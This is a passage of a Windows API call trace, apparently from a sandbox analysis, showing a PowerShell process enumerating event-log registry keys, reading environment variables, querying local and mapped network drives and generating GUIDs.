	[0042.345] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.345] CoTaskMemFree (pv=0x0) 
	[0042.345] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.345] CoTaskMemFree (pv=0x0) 
	[0042.345] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.346] CoTaskMemFree (pv=0x0) 
	[0042.346] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.346] CoTaskMemFree (pv=0x0) 
	[0042.346] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.346] CoTaskMemFree (pv=0x0) 
	[0042.346] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.346] CoTaskMemFree (pv=0x0) 
	[0042.346] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x2
	[0042.346] RegCloseKey (hKey=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x2
	[0042.346] RegCloseKey (hKey=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x2
	[0042.346] RegCloseKey (hKey=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x2
	[0042.346] RegCloseKey (hKey=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.346] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x2
	[0042.346] RegCloseKey (hKey=0x354) returned 0x0
	[0042.347] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x5
	[0042.347] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.347] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x0) returned 0x2
	[0042.347] RegCloseKey (hKey=0x354) returned 0x0
	[0042.347] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x354) returned 0x0
	[0042.348] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d0b8 | out: phkResult=0x184b47d0b8*=0x35c) returned 0x0
	[0042.348] RegCloseKey (hKey=0x35c) returned 0x0
	[0042.348] RegCloseKey (hKey=0x358) returned 0x0
	[0042.348] RegCloseKey (hKey=0x354) returned 0x0
	[0042.349] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d008 | out: phkResult=0x184b47d008*=0x354) returned 0x0
	[0042.349] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x184b47d090, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x184b47d090*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d088*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x150471a6d48, lpcchName=0x184b47d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x184b47d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.349] CoTaskMemFree (pv=0x0) 
	[0042.349] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.349] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x2
	[0042.349] RegCloseKey (hKey=0x358) returned 0x0
	[0042.349] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.349] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x2
	[0042.350] RegCloseKey (hKey=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x2
	[0042.350] RegCloseKey (hKey=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x2
	[0042.350] RegCloseKey (hKey=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x2
	[0042.350] RegCloseKey (hKey=0x358) returned 0x0
	[0042.350] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x5
	[0042.351] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.351] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x0) returned 0x2
	[0042.351] RegCloseKey (hKey=0x358) returned 0x0
	[0042.351] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x358) returned 0x0
	[0042.351] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d068 | out: phkResult=0x184b47d068*=0x35c) returned 0x0
	[0042.351] RegCloseKey (hKey=0x35c) returned 0x0
	[0042.351] RegCloseKey (hKey=0x354) returned 0x0
	[0042.351] RegCloseKey (hKey=0x358) returned 0x0
	[0042.352] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1505f5b0008
	[0042.355] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150471a80c8*="Registry", lpRawData=0x150471a7f10) returned 1
	[0042.363] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150471ad118*="Alias", lpRawData=0x150471acf80) returned 1
	[0042.364] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150471b2310*="Environment", lpRawData=0x150471b2178) returned 1
	[0042.370] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9c90
	[0042.370] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x1505f3b9c90, nSize=0x104 | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0042.370] CoTaskMemFree (pv=0x1505f3b9c90) 
	[0042.370] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x184b47cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0042.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d1f0) returned 1
	[0042.371] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0x184b47d2d0 | out: lpFileInformation=0x184b47d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0042.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d1b0) returned 1
	[0042.371] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b7650
	[0042.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b7650, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0042.371] CoTaskMemFree (pv=0x1505f3b7650) 
	[0042.372] GetLogicalDrives () returned 0x2000004
	[0042.373] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x184b47cb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0042.373] GetFullPathNameW (in: lpFileName="Z:\\.", nBufferLength=0x105, lpBuffer=0x184b47cb00, lpFilePart=0x0 | out: lpBuffer="Z:\\", lpFilePart=0x0) returned 0x3
	[0042.373] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0042.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d1a0) returned 1
	[0042.373] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x184b47d060, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x184b47d260, lpMaximumComponentLength=0x184b47d258, lpFileSystemFlags=0x184b47d250, lpFileSystemNameBuffer=0x184b47cfe0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x184b47d260*=0xa283c81, lpMaximumComponentLength=0x184b47d258*=0xff, lpFileSystemFlags=0x184b47d250*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0042.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d130) returned 1
	[0042.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0042.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0042.375] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x184b47cce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0042.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d180) returned 1
	[0042.375] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x150471b4b08 | out: lpFileInformation=0x150471b4b08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b1b422b, ftLastAccessTime.dwHighDateTime=0x1d41e84, ftLastWriteTime.dwLowDateTime=0x1b1b422b, ftLastWriteTime.dwHighDateTime=0x1d41e84, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0042.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d140) returned 1
	[0042.376] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x184b47cce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0042.376] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x184b47cb50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0042.376] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0042.376] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0042.376] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0042.376] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0042.391] CoTaskMemAlloc (cb=0x25c) returned 0x1505f3b2f80
	[0042.391] WNetGetConnectionW (in: lpLocalName="Z:", lpRemoteName=0x1505f3b2f80, lpnLength=0x184b47d218 | out: lpRemoteName="\\\\192.168.0.1\\documents", lpnLength=0x184b47d218) returned 0x0
	[0043.280] CoTaskMemFree (pv=0x1505f3b2f80) 
	[0043.280] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0043.280] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0043.280] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0043.284] PathIsNetworkPathW (pszPath="C:\\") returned 0
	[0043.285] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x184b47cb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0043.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0043.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0043.287] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16
	[0043.287] PathIsNetworkPathW (pszPath="Z:\\") returned 1
	[0043.308] GetFullPathNameW (in: lpFileName="Z:\\.", nBufferLength=0x105, lpBuffer=0x184b47cb20, lpFilePart=0x0 | out: lpBuffer="Z:\\", lpFilePart=0x0) returned 0x3
	[0043.308] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0043.308] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0043.310] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150471ba2c0*="FileSystem", lpRawData=0x150471ba128) returned 1
	[0043.312] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150471bf628*="Function", lpRawData=0x150471bf490) returned 1
	[0043.314] ReportEventW (hEventLog=0x1505f5b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x150471c46f8*="Variable", lpRawData=0x150471c4560) returned 1
	[0043.372] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d218 | out: phkResult=0x184b47d218*=0x3b4) returned 0x0
	[0043.372] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d268, lpData=0x0, lpcbData=0x184b47d260*=0x0 | out: lpType=0x184b47d268*=0x1, lpData=0x0, lpcbData=0x184b47d260*=0x56) returned 0x0
	[0043.372] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d268, lpData=0x150471d4fe8, lpcbData=0x184b47d260*=0x56 | out: lpType=0x184b47d268*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d260*=0x56) returned 0x0
	[0043.372] RegCloseKey (hKey=0x3b4) returned 0x0
	[0043.397] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x81f5b09a, Data2=0x30ef, Data3=0x4475, Data4=([0]=0xa8, [1]=0xd1, [2]=0x91, [3]=0xa2, [4]=0x78, [5]=0xc3, [6]=0x5a, [7]=0x5a))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x3692b529, Data2=0x7937, Data3=0x4e91, Data4=([0]=0x9f, [1]=0x89, [2]=0xa6, [3]=0xd3, [4]=0xf4, [5]=0xff, [6]=0x22, [7]=0x29))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xb0eb7352, Data2=0xd887, Data3=0x4da9, Data4=([0]=0xa1, [1]=0xdd, [2]=0xc1, [3]=0x32, [4]=0xe6, [5]=0xcf, [6]=0x59, [7]=0x19))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xfce2d318, Data2=0xde95, Data3=0x44cd, Data4=([0]=0x8e, [1]=0x45, [2]=0xe4, [3]=0x9c, [4]=0x2e, [5]=0xe4, [6]=0x11, [7]=0xf1))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x57a510b9, Data2=0x849a, Data3=0x43c8, Data4=([0]=0xb0, [1]=0x73, [2]=0x71, [3]=0xd, [4]=0x83, [5]=0xd0, [6]=0x9a, [7]=0x26))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xec6d24e, Data2=0x1b60, Data3=0x46b6, Data4=([0]=0x92, [1]=0x1b, [2]=0x27, [3]=0xe3, [4]=0xda, [5]=0x81, [6]=0x56, [7]=0x90))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x91ec34f9, Data2=0xcd64, Data3=0x4a9f, Data4=([0]=0xa1, [1]=0x34, [2]=0xdb, [3]=0xae, [4]=0x55, [5]=0xf8, [6]=0x34, [7]=0x3d))) returned 0x0
	[0043.398] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xd175e0ca, Data2=0xe829, Data3=0x4458, Data4=([0]=0xad, [1]=0x54, [2]=0x26, [3]=0x8d, [4]=0x84, [5]=0x42, [6]=0x20, [7]=0xc8))) returned 0x0
	[0043.408] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x7c19808a, Data2=0xc4a7, Data3=0x49ff, Data4=([0]=0xb8, [1]=0x9f, [2]=0xb1, [3]=0x82, [4]=0x80, [5]=0x26, [6]=0x1b, [7]=0x5))) returned 0x0
	[0043.408] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x82056e9e, Data2=0xf407, Data3=0x4248, Data4=([0]=0xa3, [1]=0x34, [2]=0xff, [3]=0x30, [4]=0x53, [5]=0xa0, [6]=0x4f, [7]=0x15))) returned 0x0
	[0043.408] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x5cafb23a, Data2=0xde53, Data3=0x4d57, Data4=([0]=0x8e, [1]=0x6d, [2]=0x74, [3]=0x78, [4]=0x9d, [5]=0x2a, [6]=0xdc, [7]=0xe7))) returned 0x0
	[0043.408] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xc3c6fdc6, Data2=0x16d7, Data3=0x46e2, Data4=([0]=0xac, [1]=0x17, [2]=0xc4, [3]=0x86, [4]=0x90, [5]=0x26, [6]=0xa3, [7]=0x39))) returned 0x0
	[0043.408] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x50a4293b, Data2=0x3467, Data3=0x44ca, Data4=([0]=0xad, [1]=0xd, [2]=0xc, [3]=0xc, [4]=0x7b, [5]=0x61, [6]=0x5c, [7]=0xef))) returned 0x0
	[0043.408] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xaa6cebeb, Data2=0x1adf, Data3=0x40b2, Data4=([0]=0xa2, [1]=0x9a, [2]=0x10, [3]=0xaa, [4]=0xb, [5]=0x6b, [6]=0x6, [7]=0x48))) returned 0x0
	[0043.410] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xa6be0c54, Data2=0x3316, Data3=0x47c9, Data4=([0]=0x8c, [1]=0xb4, [2]=0xc3, [3]=0xe3, [4]=0xff, [5]=0x22, [6]=0xce, [7]=0xef))) returned 0x0
	[0043.410] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x81f2e868, Data2=0x81aa, Data3=0x44c1, Data4=([0]=0xac, [1]=0x2b, [2]=0x73, [3]=0x5c, [4]=0x1c, [5]=0xbc, [6]=0x49, [7]=0x5d))) returned 0x0
	[0043.410] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x499d7143, Data2=0x9621, Data3=0x4d76, Data4=([0]=0x87, [1]=0xd, [2]=0x5e, [3]=0x72, [4]=0x66, [5]=0x4, [6]=0xe5, [7]=0x63))) returned 0x0
	[0043.410] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x5c437792, Data2=0x6df8, Data3=0x46af, Data4=([0]=0xb4, [1]=0xb9, [2]=0x14, [3]=0x23, [4]=0xdf, [5]=0x59, [6]=0x7, [7]=0xdf))) returned 0x0
	[0043.412] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x7cfa0e5f, Data2=0x27c8, Data3=0x48c8, Data4=([0]=0xa1, [1]=0xaf, [2]=0x39, [3]=0x16, [4]=0x36, [5]=0xd0, [6]=0x5d, [7]=0x4e))) returned 0x0
	[0043.413] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x6d8f6c36, Data2=0x497, Data3=0x448f, Data4=([0]=0x88, [1]=0xc9, [2]=0x3a, [3]=0xe5, [4]=0xf9, [5]=0xd7, [6]=0x17, [7]=0x9d))) returned 0x0
	[0043.413] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x15363ef4, Data2=0x668d, Data3=0x42ed, Data4=([0]=0xa5, [1]=0x51, [2]=0x3e, [3]=0x8f, [4]=0x48, [5]=0x92, [6]=0x25, [7]=0xcd))) returned 0x0
